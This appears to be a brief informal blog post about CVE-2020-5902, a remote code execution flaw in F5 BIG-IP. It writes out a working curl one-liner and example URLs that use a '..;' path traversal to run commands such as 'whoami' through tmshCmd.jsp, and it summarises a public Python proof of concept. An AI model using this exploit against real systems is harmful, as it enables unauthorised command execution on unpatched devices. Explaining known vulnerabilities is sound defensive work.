Sadly, this vulnerability doesn't have a cool logo and a theme song. Just some POCs.
Yeah, at this point, we've all heard about CVE-2020-5902 related to F5 Networks' BIG-IP. Which, to my knowledge is a load balancer. It's essentially a proxy that distributes traffic across a number of servers. Cool.
What's that?! No joke? RCE with a one-liner?! Bruh!
Again, taking a look:
curl -v -k 'https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=<command+here>
Looks like the python script here essentially does the same thing. It starts by importing the requests library (and a few others like sys and json):
import requests import sys import json import argparse
Then has you throw a url at it.
The URL arg accepts an input like the following:
-u https://<domain/IP> and then it specifies a path based on the option (-o) you select. If looking to test for RCE, it runs a "list auth user admin" command, which as I understand it, lists all users and the admin user. It does that by appending:
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin to the path.
So, check it:
https://the.ip.goes.here/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami would run the whoami command. That's if the system is vulnerable. Pretty simple, actually.
That's some easy pwns if you don't fix yo crap.